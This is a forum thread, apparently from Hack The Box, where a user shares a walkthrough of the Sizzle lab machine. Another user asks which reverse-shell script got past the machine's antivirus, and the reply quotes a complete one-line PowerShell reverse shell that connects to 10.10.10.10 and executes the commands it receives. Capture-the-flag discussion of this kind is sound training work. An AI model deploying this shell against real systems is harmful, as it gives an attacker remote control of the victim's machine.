Sizzle write-up by limbernie

limbernie · June 1, 2019, 5:03pm

Anyone fancy some bacon?

https://hackso.me/sizzle-htb-walkthrough/

tabacci · June 1, 2019, 8:46pm

Thank you for sharing your write up.
What is your rev.ps1 that was not caught by sizzle AV?

I managed to get reverse shell only after delibirate evasion.

limbernie · June 2, 2019, 6:25am

Thanks for reading. It’s from @egre55 gist. I hyperlinked it in the write-up.

gist.github.com

https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

powershell_reverse_shell.ps1

# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Topic		Replies	Views
[ACADEMY] Windows Privilege Escalation Skills Assessment - Part I reverse shell help Academy academy-help	1	558	June 15, 2023
Poison write-up Writeups writeup , poison , write-up	5	983	September 16, 2018
Archetype reverse shell Machines noob , archetype	7	1817	August 30, 2022
ForwardSlash write-up by limbernie Writeups retired , writeups , forwardslash	1	381	July 6, 2020
Need some Help with a payload and reverse shell, how to make it interactive? Off-topic	4	344	November 11, 2021

Sizzle write-up by limbernie

Related topics